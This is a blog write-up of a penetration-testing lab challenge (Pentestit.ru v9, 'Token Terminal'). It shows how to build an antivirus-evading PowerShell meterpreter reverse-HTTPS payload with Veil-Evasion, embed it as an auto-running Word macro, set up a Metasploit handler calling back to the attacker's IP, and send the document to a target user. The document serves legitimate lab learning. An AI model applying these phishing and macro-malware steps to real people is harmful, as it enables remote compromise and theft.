Pentestit.ru V.9 (Part 13) – Token Terminal
So, here we are again, almost finishing the Pentestit.ru lab v9.
This TOKEN was really hard, specially because you had to have in mind everything you went ahead till arrive here, and that everything has its own purpose.
Remember the reply email we were getting when going after the Email Token?
That is our way in into Terminal Token, and I have to be honest, I had no idea if I didn’t had a look into the WriteUp 😛
So, let’s go into it:
So it seams that r.diaz might be on a “Terminal” and it is allowed to open Microsoft documents, that might give us a door into his “Terminal” 😀
So lets get things started, shall we?
So, we need to make use of macros to insert a payload in the document. But we must be aware that we might need to bypass an AV system. To do so we will make use of a tool known as Veil-Evasion:
First lets download it.
Make sure you use root, when installing it, else you will have problems installing python27. (I had them 😉 )
/opt/#git clone https://github.com/Veil-Framework/Veil-Evasion.git /opt/Veil-Evasion/setup# ./setup.sh
After installing Veil-Evasion and all it’s dependency, we must now create our payload:
/opt/Veil-Evasion# ./Veil-Evasion.py Veil-Evasion | [Version]: 2.28.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Main Menu 51 payloads loaded Available Commands: use Use a specific payload info Information on a specific payload list List available payloads update Update Veil-Evasion to the latest version clean Clean out payload folders checkvt Check payload hashes vs. VirusTotal exit Exit Veil-Evasion [menu>>]:
So, now we had to select our payload, and we opted for payload 23 (powershell/meterpreter/rev_https), you can issue the command list to see all the available payloads.
Why this one? Because the inside network 192.168.X.X can only communicate with “our” vpn network via HTTPS port 443.
[menu>>]: use 23 … [powershell/meterpreter/rev_https>>]: set LHOST 10.10.160.234 [i] LHOST => 10.10.160.234 [powershell/meterpreter/rev_https>>]: set LPORT 443 [i] LPORT => 443 [powershell/meterpreter/rev_https>>]: generate
Now we need to convert the generated .bat into a viable macro to put into the word document.
After some research I found out a tool know as macro_safe. Download it here
So, now we just run our program to get our macro done in the final format:
~/pentestit.ru/terminal$ ./macro_safe.py /usr/share/veil-output/source/terminalpayload.bat macroterminalworddoc
Ok, we are almost done, now lets open in a Windows machine box, Microsoft Word, and add the macro:
Going to Tab Development -> Visual Basic (Alt+F11) and copy your macro into ThisDocument
Since this macro is to execute automaticaly, we need to change the function name to AutoOpen() since this is a word document, if it was excel we would change to Auto_Open().
We are almost done, now we just need to setup our listener, and send our infected word document:
/pentestit.ru/terminal$ sudo msfconsole -r /usr/share/veil-output/handlers/terminalpayload_handler.rc [*] Processing /usr/share/veil-output/handlers/terminalpayload_handler.rc for ERB directives. resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> use exploit/multi/handler resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set LHOST 10.10.160.234 LHOST => 10.10.160.234 resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set LPORT 443 LPORT => 443 resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set ExitOnSession false ExitOnSession => false resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> exploit -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://10.10.160.234:443 [*] Starting the payload handler... msf exploit(handler) >
Note: Please notice that we invoke our handler that was created by Veil, into the directory /usr/share/veil-output/handlers/ we do so, calling msfconsole with -r option and the handler name. That will set our handler for us.
Now we just need to send the word document:
Just wait a while and there we go:
We interact with the session:
Lets get some information like where we are:
Now we must search for our token:
Now we went to the Desktop directory and there it was:
There you go: Token terminal – **i***l*
Hope you guys have enjoyed this one as much as I did. It was really a good learning experience, and it opened my mind to new kind of attacks, which I ended up exploring.
Note: The method above doesn’t work on most recent versions of Microsoft Office, for that you have other methods 😉 I ended up taking a lot of time after successfully taking this Token, to try other different methods of add macros, and bypass even the most recent AV. Upon requests I might upload a tutorial about how to do so, but think about it…